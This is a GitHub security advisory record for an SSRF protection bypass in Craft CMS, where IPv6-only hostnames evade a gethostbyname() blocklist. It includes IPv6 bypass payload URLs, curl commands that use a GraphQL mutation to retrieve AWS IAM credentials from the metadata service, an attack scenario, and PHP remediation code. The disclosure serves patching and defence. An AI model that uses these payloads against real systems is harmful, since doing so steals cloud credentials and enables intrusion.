{"id":"GHSA-v2gc-rm6g-wrw9","summary":"Craft CMS: Cloud Metadata SSRF Protection Bypass via IPv6 Resolution","details":"The SSRF validation in Craft CMS’s GraphQL Asset mutation uses `gethostbyname()`, which only resolves IPv4 addresses. When a hostname has only AAAA (IPv6) records, the function returns the hostname string itself, causing the blocklist comparison to always fail and completely bypassing SSRF protection.\n\nThis is a bypass of the security fix for CVE-2025-68437 ([GHSA-x27p-wfqw-hfcc](https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc)).\n\n## Required Permissions\n\nExploitation requires GraphQL schema permissions for:\n- Edit assets in the `\u003cVolumeName\u003e` volume\n- Create assets in the `\u003cVolumeName\u003e` volume\n\nThese permissions may be granted to:\n- Authenticated users with appropriate GraphQL schema access\n- Public Schema (if misconfigured with write permissions)\n\n---\n\n## Technical Details\n\n### Root Cause\n\nFrom PHP documentation: *\"gethostbyname - Get the IPv4 address corresponding to a given Internet host name\"*\n\nWhen no IPv4 (A record) exists, `gethostbyname()` returns the hostname string unchanged.\n\n### Bypass Mechanism\n\n```\n+-----------------------------------------------------------------------------+\n| Step 1: Attacker provides URL                                               |\n|         http://fd00-ec2--254.sslip.io/latest/meta-data/                     |\n+-----------------------------------------------------------------------------+\n| Step 2: Validation calls gethostbyname('fd00-ec2--254.sslip.io')            |\n|         -\u003e No A record exists                                               |\n|         -\u003e Returns: \"fd00-ec2--254.sslip.io\" (string, not an IP!)           |\n+-----------------------------------------------------------------------------+\n| Step 3: Blocklist check                                                     |\n|         in_array(\"fd00-ec2--254.sslip.io\", ['169.254.169.254', ...])       |\n|         -\u003e FALSE (string != IPv4 addresses)                                 |\n|         -\u003e VALIDATION PASSES                                                |\n+-----------------------------------------------------------------------------+\n| Step 4: Guzzle makes HTTP request                                           |\n|         -\u003e Resolves DNS (including AAAA records)                            |\n|         -\u003e Gets IPv6: fd00:ec2::254                                         |\n|         -\u003e Connects to AWS IMDS IPv6 endpoint                               |\n|         -\u003e CREDENTIALS STOLEN                                               |\n+-----------------------------------------------------------------------------+\n```\n\n---\n\n## Bypass Payloads\n\n### Blocked IPv4 Addresses and Their IPv6 Bypass Equivalents\n\n| Cloud Provider | Blocked IPv4 | IPv6 Equivalent | Bypass Payload |\n|----------------|--------------|-----------------|----------------|\n| **AWS EC2 IMDS** | `169.254.169.254` | `fd00:ec2::254` | `http://fd00-ec2--254.sslip.io/` |\n| **AWS ECS** | `169.254.170.2` | `fd00:ec2::254` (via IMDS) | `http://fd00-ec2--254.sslip.io/` |\n| **Google Cloud GCP** | `169.254.169.254` | `fd20:ce::254` | `http://fd20-ce--254.sslip.io/` |\n| **Azure** | `169.254.169.254` | No IPv6 endpoint | N/A |\n| **Alibaba Cloud** | `100.100.100.200` | No documented IPv6 | N/A |\n| **Oracle Cloud** | `192.0.0.192` | No documented IPv6 | N/A |\n\n### Additional IPv6 Internal Service Bypass Payloads\n\n| Target | IPv6 Address | Bypass Payload |\n|--------|--------------|----------------|\n| **IPv6 Loopback** | `::1` | `http://0-0-0-0-0-0-0-1.sslip.io/` |\n| **AWS NTP Service** | `fd00:ec2::123` | `http://fd00-ec2--123.sslip.io/` |\n| **AWS DNS Service** | `fd00:ec2::253` | `http://fd00-ec2--253.sslip.io/` |\n| **IPv4-mapped IPv6** | `::ffff:169.254.169.254` | `http://0-0-0-0-0-0-ffff-a9fe-a9fe.sslip.io/` |\n\n---\n\n## Steps to Reproduce\n\n### Step 1: Verify DNS Resolution\n\n```bash\n# Verify the hostname has no IPv4 record (what gethostbyname sees)\n$ dig fd00-ec2--254.sslip.io A +short\n# (empty - no IPv4 record)\n\n# Verify the hostname has IPv6 record (what Guzzle/curl uses)\n$ dig fd00-ec2--254.sslip.io AAAA +short\nfd00:ec2::254\n```\n\n### Step 2: Enumerate AWS IAM Role Name\n\n```bash\ncurl -sk \"https://TARGET/index.php?p=admin/actions/graphql/api\" \\\n  -H \"Content-Type: application/json\" \\\n  -H \"Authorization: Bearer YOUR_GRAPHQL_TOKEN\" \\\n  -d '{\n    \"query\": \"mutation { save_photos_Asset(_file: { url: \\\"http://fd00-ec2--254.sslip.io/latest/meta-data/iam/security-credentials/\\\", filename: \\\"role.txt\\\" }) { id } }\"\n  }'\n```\n\n### Step 3: Retrieve AWS Credentials\n\n```bash\n# Replace ROLE_NAME with the role discovered in Step 2\ncurl -sk \"https://TARGET/index.php?p=admin/actions/graphql/api\" \\\n  -H \"Content-Type: application/json\" \\\n  -H \"Authorization: Bearer YOUR_GRAPHQL_TOKEN\" \\\n  -d '{\n    \"query\": \"mutation { save_photos_Asset(_file: { url: \\\"http://fd00-ec2--254.sslip.io/latest/meta-data/iam/security-credentials/ROLE_NAME\\\", filename: \\\"creds.json\\\" }) { id } }\"\n  }'\n```\n\n### Step 4: Access Saved Credentials\n\nThe credentials will be saved to the asset volume (e.g., `/userphotos/photos/creds.json`).\n\n---\n\n### Attack Scenario\n\n1. Attacker finds Craft CMS instance with GraphQL asset mutations enabled\n2. Attacker sends mutation with `url: \"http://fd00-ec2--254.sslip.io/latest/meta-data/iam/security-credentials/\"`\n3. Error message or saved file reveals IAM role name\n4. Attacker retrieves credentials via second mutation\n5. Attacker uses credentials to access AWS services\n6. **Attacker can now achieve code execution by creating new EC2 instances with their SSH key**\n\n---\n\n## Remediation\n\nReplace `gethostbyname()` with `dns_get_record()` to check both IPv4 and IPv6:\n\n```php\n// Resolve both IPv4 and IPv6 addresses\n$records = @dns_get_record($hostname, DNS_A | DNS_AAAA);\nif ($records === false) {\n    $records = [];\n}\n\n// Blocked IPv6 metadata prefixes\n$blockedIPv6Prefixes = [\n    'fd00:ec2::',       // AWS IMDS, DNS, NTP\n    'fd20:ce::',        // GCP Metadata\n    '::1',              // Loopback\n    'fe80:',            // Link-local\n    '::ffff:',          // IPv4-mapped IPv6\n];\n\nforeach ($records as $record) {\n    // Check IPv4 (existing logic)\n    if (isset($record['ip']) && in_array($record['ip'], $blockedIPv4)) {\n        return false;\n    }\n\n    // Check IPv6 (NEW)\n    if (isset($record['ipv6'])) {\n        foreach ($blockedIPv6Prefixes as $prefix) {\n            if (str_starts_with($record['ipv6'], $prefix)) {\n                return false;\n            }\n        }\n    }\n}\n```\n\n### Additional Mitigations\n\n| Mitigation | Description |\n|------------|-------------|\n| Block wildcard DNS services | Block nip.io, sslip.io, xip.io suffixes |\n| Use `dns_get_record()` | Resolves both IPv4 and IPv6 |\n\n---\n\n## Resources\n\n- https://github.com/craftcms/cms/commit/2825388b4f32fb1c9bd709027a1a1fd192d709a3\n- [PHP: gethostbyname](https://www.php.net/manual/en/function.gethostbyname.php) - \"Get the **IPv4 address** corresponding to a given Internet host name\"\n- [GHSA-x27p-wfqw-hfcc](https://github.com/advisories/GHSA-x27p-wfqw-hfcc) - Original SSRF vulnerability (CVE-2025-68437)\n- [AWS IMDS IPv6 Documentation](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-retrieval.html)\n- [GCP Metadata Server Documentation](https://cloud.google.com/compute/docs/metadata/querying-metadata)\n- [PayloadsAllTheThings - SSRF Cloud Instances](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/SSRF-Cloud-Instances.md)","aliases":["CVE-2026-27129"],"modified":"2026-02-24T20:59:13.352088Z","published":"2026-02-24T15:51:07Z","related":["CVE-2026-27129"],"database_specific":{"severity":"MODERATE","github_reviewed":true,"github_reviewed_at":"2026-02-24T15:51:07Z","nvd_published_at":"2026-02-24T03:16:02Z","cwe_ids":["CWE-918"]},"references":[{"type":"WEB","url":"https://github.com/craftcms/cms/security/advisories/GHSA-v2gc-rm6g-wrw9"},{"type":"WEB","url":"https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27129"},{"type":"WEB","url":"https://github.com/craftcms/cms/commit/2825388b4f32fb1c9bd709027a1a1fd192d709a3"},{"type":"PACKAGE","url":"https://github.com/craftcms/cms"}],"affected":[{"package":{"name":"craftcms/cms","ecosystem":"Packagist","purl":"pkg:composer/craftcms/cms"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"5.0.0-RC1"},{"fixed":"5.8.23"}]}],"versions":["5.0.0","5.0.0-RC1","5.0.1","5.0.2","5.0.3","5.0.4","5.0.5","5.0.6","5.1.0","5.1.1","5.1.10","5.1.2","5.1.3","5.1.4","5.1.5","5.1.6","5.1.7","5.1.8","5.1.9","5.2.0","5.2.0-beta.1","5.2.0-beta.2","5.2.0-beta.3","5.2.0-beta.4","5.2.0-beta.5","5.2.0-beta.6","5.2.1","5.2.10","5.2.2","5.2.3","5.2.4","5.2.4.1","5.2.5","5.2.6","5.2.7","5.2.8","5.2.9","5.3.0","5.3.0-beta.1","5.3.0-beta.2","5.3.0.1","5.3.0.2","5.3.0.3","5.3.1","5.3.2","5.3.3","5.3.4","5.3.5","5.3.6","5.4.0","5.4.0.1","5.4.1","5.4.10","5.4.10.1","5.4.2","5.4.3","5.4.4","5.4.5","5.4.5.1","5.4.6","5.4.7","5.4.7.1","5.4.8","5.4.9","5.5.0","5.5.0.1","5.5.1","5.5.1.1","5.5.10","5.5.2","5.5.3","5.5.4","5.5.5","5.5.6","5.5.6.1","5.5.7","5.5.8","5.5.9","5.6.0","5.6.0.1","5.6.0.2","5.6.1","5.6.10","5.6.10.1","5.6.10.2","5.6.11","5.6.12","5.6.13","5.6.14","5.6.15","5.6.16","5.6.17","5.6.2","5.6.3","5.6.4","5.6.5","5.6.5.1","5.6.6","5.6.7","5.6.8","5.6.9","5.6.9.1","5.7.0","5.7.0-beta.1","5.7.0-beta.2","5.7.1","5.7.1.1","5.7.10","5.7.11","5.7.2","5.7.3","5.7.4","5.7.5","5.7.6","5.7.7","5.7.8","5.7.8.1","5.7.8.2","5.7.9","5.8.0","5.8.1","5.8.10","5.8.11","5.8.12","5.8.13","5.8.13.1","5.8.13.2","5.8.14","5.8.15","5.8.16","5.8.17","5.8.18","5.8.19","5.8.2","5.8.20","5.8.21","5.8.22","5.8.3","5.8.4","5.8.5","5.8.6","5.8.7","5.8.8","5.8.9"],"database_specific":{"last_known_affected_version_range":"\u003c= 5.8.22","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/02/GHSA-v2gc-rm6g-wrw9/GHSA-v2gc-rm6g-wrw9.json"}},{"package":{"name":"craftcms/cms","ecosystem":"Packagist","purl":"pkg:composer/craftcms/cms"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"3.5.0"},{"fixed":"4.16.19"}]}],"versions":["3.5.0","3.5.1","3.5.10","3.5.10.1","3.5.11","3.5.11.1","3.5.12","3.5.12.1","3.5.13","3.5.13.1","3.5.13.2","3.5.14","3.5.15","3.5.15.1","3.5.16","3.5.17","3.5.17.1","3.5.18","3.5.19","3.5.19.1","3.5.2","3.5.3","3.5.4","3.5.5","3.5.6","3.5.7","3.5.8","3.5.9","3.6.0","3.6.0-RC1","3.6.0-RC2","3.6.0-RC2.1","3.6.0-RC3","3.6.0-RC4","3.6.0-beta.1","3.6.0-beta.1.1","3.6.0-beta.2","3.6.0.1","3.6.1","3.6.10","3.6.11","3.6.11.1","3.6.11.2","3.6.12","3.6.12.1","3.6.13","3.6.14","3.6.15","3.6.16","3.6.17","3.6.18","3.6.2","3.6.3","3.6.4","3.6.4.1","3.6.5","3.6.5.1","3.6.6","3.6.7","3.6.8","3.6.9","3.7.0","3.7.0-beta.1","3.7.0-beta.2","3.7.0-beta.3","3.7.0-beta.4","3.7.0-beta.5","3.7.0-beta.6","3.7.1","3.7.10","3.7.11","3.7.12","3.7.13","3.7.14","3.7.15","3.7.16","3.7.17","3.7.17.1","3.7.17.2","3.7.18","3.7.18.1","3.7.18.2","3.7.19","3.7.19.1","3.7.2","3.7.20","3.7.21","3.7.22","3.7.23","3.7.24","3.7.25","3.7.25.1","3.7.26","3.7.27","3.7.27.1","3.7.27.2","3.7.28","3.7.29","3.7.3","3.7.3.1","3.7.3.2","3.7.30","3.7.30.1","3.7.31","3.7.32","3.7.33","3.7.34","3.7.35","3.7.36","3.7.37","3.7.38","3.7.39","3.7.4","3.7.40","3.7.40.1","3.7.41","3.7.42","3.7.43","3.7.44","3.7.45","3.7.45.1","3.7.45.2","3.7.46","3.7.47","3.7.47.1","3.7.48","3.7.49","3.7.5","3.7.50","3.7.51","3.7.52","3.7.53","3.7.53.1","3.7.54","3.7.55","3.7.55.1","3.7.55.2","3.7.55.3","3.7.56","3.7.57","3.7.58","3.7.59","3.7.6","3.7.60","3.7.61","3.7.62","3.7.63","3.7.63.1","3.7.64","3.7.64.1","3.7.65","3.7.65.1","3.7.65.2","3.7.66","3.7.67","3.7.68","3.7.7","3.7.8","3.7.9","3.8.0","3.8.0-beta.1","3.8.0-beta.2","3.8.0-beta.3","3.8.0-beta.4","3.8.0-beta.5","3.8.0-beta.6","3.8.1","3.8.10","3.8.10.1","3.8.10.2","3.8.11","3.8.12","3.8.13","3.8.14","3.8.15","3.8.16","3.8.17","3.8.2","3.8.3","3.8.4","3.8.5","3.8.6","3.8.7","3.8.8","3.8.9","3.9.0","3.9.1","3.9.10","3.9.11","3.9.12","3.9.13","3.9.14","3.9.15","3.9.2","3.9.3","3.9.4","3.9.5","3.9.6","4.0.0","4.0.0-RC1","4.0.0-RC2","4.0.0-RC3","4.0.0-alpha.1","4.0.0-beta.1","4.0.0-beta.2","4.0.0-beta.3","4.0.0-beta.4","4.0.0.1","4.0.1","4.0.2","4.0.3","4.0.4","4.0.5","4.0.5.1","4.0.5.2","4.0.6","4.1.0","4.1.0.1","4.1.0.2","4.1.1","4.1.2","4.1.3","4.1.4","4.1.4.1","4.10.0","4.10.0-beta.1","4.10.0-beta.2","4.10.1","4.10.2","4.10.3","4.10.4","4.10.5","4.10.6","4.10.7","4.10.8","4.11.0","4.11.0.1","4.11.0.2","4.11.1","4.11.2","4.11.3","4.11.4","4.11.5","4.12.0","4.12.1","4.12.2","4.12.3","4.12.4","4.12.4.1","4.12.5","4.12.6","4.12.6.1","4.12.7","4.12.8","4.12.9","4.13.0","4.13.1","4.13.1.1","4.13.10","4.13.2","4.13.3","4.13.4","4.13.5","4.13.6","4.13.7","4.13.8","4.13.9","4.14.0","4.14.0.1","4.14.0.2","4.14.1","4.14.10","4.14.11","4.14.11.1","4.14.12","4.14.13","4.14.14","4.14.15","4.14.2","4.14.3","4.14.4","4.14.5","4.14.6","4.14.7","4.14.8","4.14.8.1","4.14.9","4.15.0","4.15.0-beta.1","4.15.0-beta.2","4.15.0.1","4.15.0.2","4.15.1","4.15.2","4.15.3","4.15.4","4.15.5","4.15.6","4.15.6.1","4.15.6.2","4.15.7","4.16.0","4.16.1","4.16.10","4.16.11","4.16.12","4.16.13","4.16.14","4.16.15","4.16.16","4.16.17","4.16.18","4.16.2","4.16.3","4.16.4","4.16.5","4.16.6","4.16.6.1","4.16.7","4.16.8","4.16.9","4.16.9.1","4.2.0","4.2.0.1","4.2.0.2","4.2.1","4.2.1.1","4.2.2","4.2.3","4.2.4","4.2.5","4.2.5.1","4.2.5.2","4.2.6","4.2.7","4.2.8","4.3.0","4.3.1","4.3.10","4.3.11","4.3.2","4.3.2.1","4.3.3","4.3.4","4.3.5","4.3.6","4.3.6.1","4.3.7","4.3.7.1","4.3.8","4.3.8.1","4.3.8.2","4.3.9","4.4.0","4.4.0-beta.1","4.4.0-beta.2","4.4.0-beta.3","4.4.0-beta.4","4.4.0-beta.5","4.4.0-beta.6","4.4.0-beta.7","4.4.1","4.4.10","4.4.10.1","4.4.11","4.4.12","4.4.13","4.4.14","4.4.15","4.4.16","4.4.16.1","4.4.17","4.4.2","4.4.3","4.4.4","4.4.5","4.4.6","4.4.6.1","4.4.7","4.4.7.1","4.4.8","4.4.9","4.5.0","4.5.0-beta.1","4.5.0-beta.2","4.5.1","4.5.10","4.5.11","4.5.11.1","4.5.12","4.5.13","4.5.14","4.5.15","4.5.2","4.5.3","4.5.4","4.5.5","4.5.6","4.5.6.1","4.5.7","4.5.8","4.5.9","4.6.0","4.6.0-RC1","4.6.1","4.7.0","4.7.1","4.7.2","4.7.2.1","4.7.3","4.7.4","4.8.0","4.8.1","4.8.10","4.8.11","4.8.2","4.8.3","4.8.4","4.8.5","4.8.6","4.8.7","4.8.8","4.8.9","4.9.0","4.9.1","4.9.2","4.9.3","4.9.4","4.9.5","4.9.6","4.9.7"],"database_specific":{"last_known_affected_version_range":"\u003c= 4.16.18","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/02/GHSA-v2gc-rm6g-wrw9/GHSA-v2gc-rm6g-wrw9.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"}]}